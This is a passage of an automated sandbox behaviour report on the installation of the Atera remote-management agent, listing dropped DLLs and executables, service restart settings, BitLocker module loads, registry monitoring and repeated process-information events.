                                Source: C:\Windows\System32\msiexec.exeFile created: 692c48.rbf (copy)Jump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Principal.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.DependencyInjection.Abstractions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\RestartReminder.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\System.Memory.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Globalization.Calendars.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Requests.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Microsoft.Win32.TaskScheduler.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\FormControlsLibrary.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI5885.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Data.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.ReaderWriter.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackages.CommonLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Memory.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Text.Encoding.Extensions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Pubnub.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\CommunityToolkit.WinUI.Notifications.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.FileSystemGlobbing.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\OpenHardwareMonitorLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.WebHeaderCollection.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Serialization.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.FileVersionInfo.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI422F.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIADBF.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI2FBD.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA8AC.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5085.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI3FBB.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3FBB.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI2FBD.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI56F2.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2FBD.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI5085.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI5085.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICBAB.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI56F2.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI2FBD.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI5085.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI3FBB.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI9409.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI432A.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI56F2.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeFile created: C:\Windows\Temp\SplashtopStreamer.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2D79.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI56F2.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5885.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI5085.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICB4C.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI2D79.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI5885.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI5885.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\Temp\SplashtopStreamer.exeFile created: C:\Windows\Temp\unpack\PreVerCheck.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIAC76.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID178.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI2FBD.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI56F2.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI3FBB.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI5885.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI2D79.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI2D79.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI3FBB.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI41D1.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI5885.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICA80.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI422F.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI2D79.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\InstallUtil.InstallLog
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\AteraAgent.InstallLog
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\TEMP\AteraSetupLog.txt
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\LICENSE.txt
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\7zip.license.txt
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\checksum.license.txt
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\shimgen.license.txt
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\LICENSE.txt
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\7zip.license.txt
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\checksum.license.txt
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\shimgen.license.txt

                                Boot Survival

                                barindex
                                Installs Task Scheduler Managed Wrapper
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Microsoft.Win32.TaskScheduler.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Microsoft.Win32.TaskScheduler.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Win32.TaskScheduler.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\net.exe "NET" STOP AteraAgent
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Windows\System32\sc.exe "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000

                                Hooking and other Techniques for Hiding and Protection

                                barindex
                                Loading BitLocker PowerShell Module
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE3EA524 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,35_2_00007FFDEE3EA524
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeRegistry key monitored for changes: HKEY_USERS.DEFAULT\Software\Classes
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeRegistry key monitored for changes: HKEY_USERS.DEFAULT\Software\Classes
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeRegistry key monitored for changes: HKEY_USERS.DEFAULT\Software\Classes
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey value created or modified: HKEY_USERS.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C Blob
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
